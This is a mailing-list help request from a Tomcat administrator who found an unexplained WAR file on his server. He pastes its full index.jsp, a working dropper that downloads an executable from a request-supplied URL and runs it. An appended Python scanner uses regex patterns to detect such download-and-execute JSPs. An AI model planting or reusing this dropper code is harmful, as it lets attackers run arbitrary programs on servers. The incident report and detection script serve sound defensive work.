I have found a WAR file on my server that appeared around July 14. I am
the only one who has access to this machine and I did not put it there.
It consists of a JSP that downloads a program named init.exe and then
executes it. This server is on a private network, though there are three
PC kiosks in grocery stores that are available to the public and access
this server; they are on a different subnet and only have access to
the server through port 8080. I am pretty sure it came from one of these
stores. The URL used for this program is .../fexcep/index.jsp?url=... I
am running Tomcat 5.5.3 on Windows XP.

How did somebody get this WAR file onto my server?

Here is the code of index.jsp:

<%@ page language="java" pageEncoding="utf-8"
    import="java.io.*,java.net.*,java.security.*,javax.crypto.*"%>
<%!
String sys=null;
public class AutoKill {
    private boolean downFile(String url,String filesrc)
    {
        try
        {
            URL urlc = new URL(url);
            HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
            con.connect();
            byte[] b=new byte[1024];
            BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
            FileOutputStream fos=new FileOutputStream(filesrc);
            int length=-1;
            while((length=bis.read(b,0,b.length))!=-1)
            {
                fos.write(b,0,length);
            }
            fos.close();
            bis.close();
            return true;
        }catch(Exception e)
        {
            e.printStackTrace();
        }
        return false;
    }
}
%>
<%
sys=System.getProperty("os.name");
int i=sys.indexOf("Windows");
AutoKill ak=new AutoKill();
if(i>-1)
{
    String result;
    try
    {
        String url=request.getParameter("userurl");
        System.out.println(url);
        String filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
        if (ak.downFile(url,filesrc) )
        {
            Process run_proc=Runtime.getRuntime().exec(filesrc);
            result="Success! ";
        }
        else
        {
            result="Failure! Down File Failure!";
        }
    }catch(Exception e)
    {
        result="Failure!throws Exception - "+e.getMessage()+"! ";
    }
    request.setAttribute("result",result);
}
else
{
    request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
}
request.getRequestDispatcher("/ok.jsp").forward(request, response);
%>

--
Thanks,
Warren Bell
909-645-8864
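
A triage sketch for the situation described above, added here as an example and not part of the original message: it walks a Tomcat webapps directory (packed WARs and exploded applications) and flags JSPs that combine the traits of the quoted index.jsp. The indicator set, the function names and the SAMPLE string are assumptions constructed for illustration, and WARs are assumed to be readable zip archives.

```python
import io
import re
import sys
import zipfile
from pathlib import Path

# Traits of the JSP quoted above: take a URL from a request parameter,
# fetch it, write the response to disk, then execute the file.
INDICATORS = {
    "param": re.compile(r"request\s*\.\s*getParameter\s*\("),
    "fetch": re.compile(r"\.\s*open(Connection|Stream)\s*\("),
    "write": re.compile(r"\bFile(OutputStream|Writer)\b"),
    "exec": re.compile(r"getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|\bProcessBuilder\b"),
}
JSP_EXT = (".jsp", ".jspx")
# Constructed sample in the shape of the quoted index.jsp (not a real file).
SAMPLE = ('<% String u = request.getParameter("userurl");\n'
          'new URL(u).openConnection(); new FileOutputStream(f);\n'
          'Runtime.getRuntime().exec(f); %>')

def score_jsp(source):
    """Return the sorted names of the indicators found in one JSP source."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(source))

def is_dropper(hits):
    """Download-and-execute needs fetch, write and exec in the same page."""
    return {"fetch", "write", "exec"} <= set(hits)

def war_sources(data, name):
    """Yield (location, text) for each JSP inside a WAR held in memory."""
    with zipfile.ZipFile(io.BytesIO(data)) as war:
        for entry in war.namelist():
            if entry.lower().endswith(JSP_EXT):
                yield f"{name}!{entry}", war.read(entry).decode("utf-8", "replace")

def webapp_sources(root):
    """Yield (location, text) for JSPs in packed WARs and exploded apps."""
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        if path.suffix.lower() == ".war":
            yield from war_sources(path.read_bytes(), str(path))
        elif path.suffix.lower() in JSP_EXT:
            yield str(path), path.read_text("utf-8", "replace")

def scan(sources):
    """Map location -> indicators for every JSP with at least one hit."""
    return {loc: hits for loc, text in sources if (hits := score_jsp(text))}

if __name__ == "__main__":  # usage: python <this file> <webapps dir>
    for loc, hits in sorted(scan(webapp_sources(sys.argv[1])).items()):
        print("DROPPER" if is_dropper(hits) else "review ", loc, hits)
```

A hit is a reason to inspect the file and its timestamps by hand, not proof of compromise; legitimate upload or reporting pages can match individual indicators.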